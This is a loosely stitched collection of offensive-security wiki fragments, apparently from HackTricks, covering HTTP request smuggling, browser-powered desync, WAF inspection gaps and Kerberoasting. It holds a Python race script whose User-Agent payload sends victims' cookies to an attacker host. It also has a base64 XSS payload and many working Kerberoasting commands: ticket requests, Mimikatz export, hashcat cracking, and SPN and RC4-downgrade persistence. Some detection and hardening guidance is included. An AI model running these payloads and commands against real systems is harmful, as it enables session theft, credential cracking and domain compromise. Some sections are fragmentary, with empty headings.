> Treat reuse-only effects as non-issues unless you can prove server-side desync and attach concrete impact (poisoned cache artifact, leaked internal header enabling privilege bypass, bypassed FE control, etc.).
## Abusing HTTP Request Smuggling
### Circumventing Front-End Security via HTTP Request Smuggling
## Tools
- HTTP Hacker (Burp BApp Store): visualize concatenation/framing and low-level HTTP behavior
- https://github.com/PortSwigger/bambdas/blob/main/CustomAction/SmugglingOrPipelining.bambda Burp Repeater Custom Action "Smuggling or pipelining?"
- [https://github.com/anshumanpattnaik/http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling)
- [https://github.com/PortSwigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler)
- [https://github.com/gwen001/pentest-tools/blob/master/smuggler.py](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)
- [https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/](https://standoff365.com/phdays10/schedule/tech/http-request-smuggling-via-higher-http-versions/)
- [https://portswigger.net/research/trace-desync-attack](https://portswigger.net/research/trace-desync-attack)
- [https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)
- Beware the false false-positive: how to distinguish HTTP pipelining from request smuggling: [https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling](https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling)
- [https://http1mustdie.com/](https://http1mustdie.com/)
- Browser-Powered Desync Attacks: [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)
- PortSwigger Academy client-side desync: [https://portswigger.net/web-security/request-smuggling/browser/client-side-desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
{{#include ../../banners/hacktricks-training.md}}

{{#include ../../banners/hacktricks-training.md}}
**Check the post [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
Browser-powered desync (aka client-side request smuggling) abuses the victim's browser to enqueue a mis-framed request onto a shared connection so that subsequent requests are parsed out-of-sync by a downstream component. Unlike classic FE↔BE smuggling, payloads are constrained by what a browser can legally send cross-origin.
Key constraints and tips
- Only use headers and syntax that a browser can emit via navigation, fetch, or form submission. Header obfuscations (LWS tricks, duplicate TE, invalid CL) generally won't send.
- Target endpoints and intermediaries that reflect inputs or cache responses. Useful impacts include cache poisoning, leaking front-end injected headers, or bypassing front-end path/method controls.
- Reuse matters: align the crafted request so it shares the same HTTP/1.1 or H2 connection as a high-value victim request. Connection-locked/stateful behaviors amplify impact.
- Prefer primitives that do not require custom headers: path confusion, query-string injection, and body shaping via form-encoded POSTs.
- Validate genuine server-side desync vs. mere pipelining artifacts by re-testing without reuse, or by using the HTTP/2 nested-response check.
For end-to-end techniques and PoCs see:
- PortSwigger Research - Browser-Powered Desync Attacks: https://portswigger.net/research/browser-powered-desync-attacks
- PortSwigger Academy - client-side desync: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync
## References
- [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)
- [https://portswigger.net/web-security/request-smuggling/browser/client-side-desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync)
- Distinguishing pipelining vs smuggling (background on reuse false-positives): https://portswigger.net/research/how-to-distinguish-http-pipelining-from-request-smuggling
{{#include ../../banners/hacktricks-training.md}}

By default, the WAF inspects only the first 8KB of a request. It can increase the limit up to 128KB.
### Obfuscation <a href="#obfuscation" id="obfuscation"></a>
### Static assets inspection gaps (.js GETs)
Some CDN/WAF stacks apply weak or no content inspection to GET requests for static assets (for example paths ending with `.js`), while still applying global rules like rate limiting and IP reputation. Combined with auto-caching of static extensions, this can be abused to deliver or seed malicious variants that affect subsequent HTML responses.
Practical use cases:
- Send payloads in untrusted headers (e.g., `User-Agent`) on a GET to a `.js` path to avoid content inspection, then immediately request the main HTML to influence the cached variant.
- Use a fresh/clean IP; once an IP is flagged, routing changes can make the technique unreliable.
- In Burp Repeater, use "Send group in parallel" (single-packet style) to race the two requests (`.js` then HTML) through the same front-end path.
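The same two-request race can also be scripted outside Burp. A minimal sketch with hypothetical host/paths (a threading barrier releases both GETs at the same instant; the cache-status header name varies by CDN):
```python
# Race a payload-bearing .js GET against the main-page GET.
import threading
import requests

HOST = "https://victim.example"  # placeholder target
UA = ("Mo00ozilla/5.0</script><script>new Image().src="
      "'https://attacker.oastify.com?a='+document.cookie</script>\"")

barrier = threading.Barrier(2)

def fire(path, headers):
    barrier.wait()  # both threads block here, then fire together
    r = requests.get(HOST + path, headers=headers, timeout=10)
    print(path, r.status_code, r.headers.get("X-Cache", "-"))

t1 = threading.Thread(target=fire, args=("/static/app.js", {"User-Agent": UA}))
t2 = threading.Thread(target=fire, args=("/", {}))
t1.start(); t2.start()
t1.join(); t2.join()
```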
This pairs well with header-reflection cache poisoning. See:
- {{#ref}}
cache-deception/README.md
{{#endref}}
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
### Obfuscation <a href="#ip-rotation" id="ip-rotation"></a>
```bash
# IIS, ASP Classic
# ...
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript payload
```
- [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
- [https://www.youtube.com/watch?v=0OMmWtU2Y_g](https://www.youtube.com/watch?v=0OMmWtU2Y_g)
- [https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization](https://0x999.net/blog/exploring-javascript-events-bypassing-wafs-via-character-normalization#bypassing-web-application-firewalls-via-character-normalization)
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
{{#include ../banners/hacktricks-training.md}}

## Kerberoast
Kerberoasting focuses on the acquisition of TGS tickets, specifically those related to services operating under user accounts in Active Directory (AD), excluding computer accounts. The encryption of these tickets utilizes keys that originate from user passwords, allowing for offline credential cracking. The use of a user account as a service is indicated by a non-empty ServicePrincipalName (SPN) property.
Any authenticated domain user can request TGS tickets, so no special privileges are needed.
### Key Points
- Targets TGS tickets for services that run under user accounts (i.e., accounts with SPN set; not computer accounts).
- Tickets are encrypted with a key derived from the service accounts password and can be cracked offline.
- No elevated privileges required; any authenticated account can request TGS tickets.
> [!WARNING]
> Most public tools prefer requesting RC4-HMAC (etype 23) service tickets because they're faster to crack than AES. RC4 TGS hashes start with `$krb5tgs$23$*`, AES128 with `$krb5tgs$17$*`, and AES256 with `$krb5tgs$18$*`. However, many environments are moving to AES-only. Do not assume only RC4 is relevant.
> Also, avoid "spray-and-pray" roasting. Rubeus' default kerberoast can query and request tickets for all SPNs and is noisy. Enumerate and target interesting principals first.
### Attack

#### Linux

```bash
# Metasploit Framework
msf> use auxiliary/gather/get_user_spns

# Impacket - request and save roastable hashes (prompts for password)
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER> -outputfile hashes.kerberoast
# With NT hash
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USER> -outputfile hashes.kerberoast
# Target a specific user's SPNs only (reduce noise)
GetUserSPNs.py -request-user <samAccountName> -dc-ip <DC_IP> <DOMAIN>/<USER>

# kerberoast by @skelsec (enumerate and roast)
# 1) Enumerate kerberoastable users via LDAP
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -o kerberoastable
# 2) Request TGS for selected SPNs and dump
kerberoast spnroast 'kerberos+password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes
```
Multi-feature tools including kerberoast checks:
```bash
# ADenum: https://github.com/SecuProject/ADenum
adenum -d <DOMAIN> -ip <DC_IP> -u <USER> -p <PASS> -c
```
#### Windows
- Enumerate kerberoastable users
```powershell
# Built-in
setspn.exe -Q */* # Focus on entries where the backing object is a user, not a computer ($)
# PowerView
Get-NetUser -SPN | Select-Object serviceprincipalname
# Rubeus stats (AES/RC4 coverage, pwd-last-set years, etc.)
.\Rubeus.exe kerberoast /stats
```
- Technique 1: Ask for TGS and dump from memory

```powershell
# Acquire a single service ticket in memory for a known SPN
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>" # e.g. MSSQLSvc/mgmt.domain.local

# Get TGSs for ALL kerberoastable accounts (computer accounts included, not really smart)
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

# Get all cached Kerberos tickets
klist

# Export tickets from LSASS (requires admin)
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Convert to cracking formats
python2.7 kirbi2john.py .\some_service.kirbi > tgs.john
# Optional: convert john -> hashcat etype23 if needed
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$*\1*$\2/' tgs.john > tgs.hashcat
```
- Technique 2: Automatic tools

```powershell
# PowerView - single SPN to hashcat format
Request-SPNTicket -SPN "<SPN>" -Format Hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast

# PowerView - all user SPNs -> CSV
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation

# Rubeus - default kerberoast (be careful, can be noisy)
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

# Rubeus - target a single account
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast

# Rubeus - target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
```
> [!WARNING]
> A TGS request generates Windows Security Event 4769 (A Kerberos service ticket was requested).
### OPSEC and AES-only environments
- Request RC4 on purpose for accounts without AES:
- Rubeus: `/rc4opsec` uses tgtdeleg to enumerate accounts without AES and requests RC4 service tickets.
- Rubeus: `/tgtdeleg` with kerberoast also triggers RC4 requests where possible.
- Roast AES-only accounts instead of failing silently:
- Rubeus: `/aes` enumerates accounts with AES enabled and requests AES service tickets (etype 17/18).
- If you already hold a TGT (PTT or from a .kirbi), you can use `/ticket:<blob|path>` with `/spn:<SPN>` or `/spns:<file>` and skip LDAP.
- Targeting, throttling and less noise:
- Use `/user:<sam>`, `/spn:<spn>`, `/resultlimit:<N>`, `/delay:<ms>` and `/jitter:<1-100>`.
- Filter for likely weak passwords using `/pwdsetbefore:<MM-dd-yyyy>` (older passwords) or target privileged OUs with `/ou:<DN>`.
Examples (Rubeus):
```powershell
# Kerberoast only AES-enabled accounts
.\Rubeus.exe kerberoast /aes /outfile:hashes.aes
# Request RC4 for accounts without AES (downgrade via tgtdeleg)
.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.rc4
# Roast a specific SPN with an existing TGT from a non-domain-joined host
.\Rubeus.exe kerberoast /ticket:C:\\temp\\tgt.kirbi /spn:MSSQLSvc/sql01.domain.local
```
### Cracking
```bash
# John the Ripper
john --format=krb5tgs --wordlist=wordlist.txt hashes.kerberoast
# Hashcat
# RC4-HMAC (etype 23)
hashcat -m 13100 -a 0 hashes.rc4 wordlist.txt
# AES128-CTS-HMAC-SHA1-96 (etype 17)
hashcat -m 19600 -a 0 hashes.aes128 wordlist.txt
# AES256-CTS-HMAC-SHA1-96 (etype 18)
hashcat -m 19700 -a 0 hashes.aes256 wordlist.txt
```
### Persistence / Abuse
If you control or can modify an account, you can make it kerberoastable by adding an SPN:
```powershell
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='fake/WhateverUn1Que'} -Verbose
```
Downgrade an account to enable RC4 for easier cracking (requires write privileges on the target object):
```powershell
# Allow only RC4 (value 4) — very noisy/risky from a blue-team perspective
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=4}
# Mixed RC4+AES (value 28)
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=28}
```
You can find useful tools for kerberoast attacks here: https://github.com/nidem/kerberoast
If you find this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)` it's due to local time skew. Sync to the DC:
- `ntpdate <DC_IP>` (deprecated on some distros)
- `rdate -n <DC_IP>`
### Detection
Kerberoasting can be stealthy. Hunt for Event ID 4769 from DCs and apply filters to reduce noise:
- Exclude service name `krbtgt` and service names ending with `$` (computer accounts).
- Exclude requests from machine accounts (`*$@*`).
- Only successful requests (Failure Code `0x0`).
- Track encryption types: RC4 (`0x17`), AES128 (`0x11`), AES256 (`0x12`). Dont alert only on `0x17`.
Example PowerShell triage:
```powershell
Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4769} -MaxEvents 1000 |
Where-Object {
($_.Message -notmatch 'krbtgt') -and
($_.Message -notmatch '\$$') -and
($_.Message -match 'Failure Code:\s+0x0') -and
($_.Message -match 'Ticket Encryption Type:\s+(0x17|0x12|0x11)') -and
($_.Message -notmatch '\$@')
} |
Select-Object -ExpandProperty Message
```
Additional ideas:
- Baseline normal SPN usage per host/user; alert on large bursts of distinct SPN requests from a single principal.
- Flag unusual RC4 usage in AES-hardened domains.
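As a starting point for the burst idea above, a rough detector over 4769 events exported as CSV is sketched below; the column names are assumptions, so adapt them to your SIEM's schema:
```python
# Flag accounts requesting many distinct SPNs within the same minute.
import csv
from collections import defaultdict

THRESHOLD = 10  # distinct SPNs per user per minute bucket

spns = defaultdict(set)
with open("4769_events.csv", newline="") as f:
    for row in csv.DictReader(f):
        bucket = row["TimeCreated"][:16]          # e.g. 2025-01-01T12:34
        spns[(row["TargetUserName"], bucket)].add(row["ServiceName"])

for (user, bucket), names in sorted(spns.items()):
    if len(names) >= THRESHOLD:
        print(f"[!] {user} requested {len(names)} distinct SPNs around {bucket}")
```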
### Mitigation / Hardening
- Use gMSA/dMSA or machine accounts for services. Managed accounts have 120+ character random passwords and rotate automatically, making offline cracking impractical.
- Enforce AES on service accounts by setting `msDS-SupportedEncryptionTypes` to AES-only (decimal 24 / hex 0x18) and then rotating the password so AES keys are derived.
- Where possible, disable RC4 in your environment and monitor for attempted RC4 usage. On DCs you can use the `DefaultDomainSupportedEncTypes` registry value to steer defaults for accounts without `msDS-SupportedEncryptionTypes` set. Test thoroughly.
- Remove unnecessary SPNs from user accounts.
- Use long, random service account passwords (25+ chars) if managed accounts are not feasible; ban common passwords and audit regularly.
### Kerberoast without a domain account (AS-requested STs)
In September 2022, Charlie Clark showed that if a principal does not require pre-authentication, it's possible to obtain a service ticket via a crafted KRB_AS_REQ by altering the sname in the request body, effectively getting a service ticket instead of a TGT. This mirrors AS-REP roasting and does not require valid domain credentials.
See details: [Semperis write-up "New Attack Paths: AS-requested STs"](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
> [!WARNING]
> You must provide a list of users because without valid credentials you cannot query LDAP with this technique.
#### Linux
- [Impacket GetUserSPNs.py (PR #1413)](https://github.com/fortra/impacket/pull/1413):
```bash
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile users.txt -dc-host dc.domain.local domain.local/
```
#### Windows
- [Rubeus (PR #139)](https://github.com/GhostPack/Rubeus/pull/139):
```powershell
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:domain.local /dc:dc.domain.local /nopreauth:NO_PREAUTH_USER /spn:TARGET_SERVICE
```
Related: if you are targeting AS-REP roastable users, see also:
{{#ref}}
asreproast.md
{{#endref}}
## References
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
- Microsoft Security Blog (2024-10-11) - Microsoft's guidance to help mitigate Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/
- SpecterOps - Rubeus Roasting documentation: https://docs.specterops.io/ghostpack/rubeus/roasting
{{#include ../../banners/hacktricks-training.md}}

- WMI-based remote exec:
{{#ref}}
./wmiexec.md
{{#endref}}
- WinRM-based remote exec:
{{#ref}}
./winrm.md
{{#endref}}